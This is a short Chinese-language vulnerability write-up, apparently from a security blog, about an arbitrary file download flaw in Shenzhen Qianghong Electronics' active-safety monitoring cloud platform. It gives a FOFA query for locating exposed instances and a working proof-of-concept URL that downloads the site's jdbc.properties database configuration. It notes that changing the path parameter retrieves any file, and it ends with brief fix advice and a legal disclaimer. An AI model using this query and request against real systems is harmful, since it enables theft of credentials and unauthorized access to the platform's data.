深圳市强鸿电子有限公司鸿运主动安全监控云平台网页存在任意文件下载漏洞,攻击者可通过此漏洞下载网站配置文件等获得登录账号密码
漏洞复现FOFA语法:body="./open/webApi.html"
获取网站数据库配置文件
POC:/808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties
访问 http://ip:port//808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties
可直接下载到该文件
替换path=后的文件可导致任意文件下载:
修复建议访问白名单
添加访问控制
严格限制访问策略
免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!
结语没有人规定,一朵花一定要成长为向日葵或者玫瑰。